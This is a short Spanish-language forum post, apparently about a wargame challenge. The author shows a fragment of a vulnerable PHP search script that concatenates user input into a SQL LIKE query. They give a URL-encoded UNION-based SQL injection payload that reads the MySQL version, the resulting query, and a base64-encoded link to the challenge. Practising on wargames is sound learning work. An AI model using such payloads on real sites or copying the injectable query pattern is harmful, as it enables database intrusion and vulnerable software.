NOTA: La parte comentareada es parte del script original la cambie para montarlo en mi localhost
Código
#$consulta = 'SELECT * FROM diccionario WHERE'; $consulta = 'SELECT * FROM tbl WHERE'; $consulta .= " nombre LIKE '%{$palabra}%' OR"; #$consulta .= " yrClaves LIKE '%{$palabra}%' OR"; $consulta .= " LIMIT 1;"; }else{ } # Esto es para mi localhost if( $query !== false ){ }
El tema es que en mi localhost logro obtener la versión del MySQL, pero en el wargame no! De la siguiente manera,
Código
Para que la query quede de la siguiente manera,
5'%09union%09select%09@@version,2%09%23
Código
En mi caso el resultado es: 5.6.21
SELECT * FROM tbl WHERE nombre LIKE '%5' UNION SELECT @@version,2 #%' LIMIT 1;
El reto original esta online, es -> aHR0cDovL3d3dy55YXNoaXJhLm9yZy9SZVRvcy9BbGwvMTY3L2RpY2Npb25hcmlvLnBocD9idXNjYXI9aXNxbA==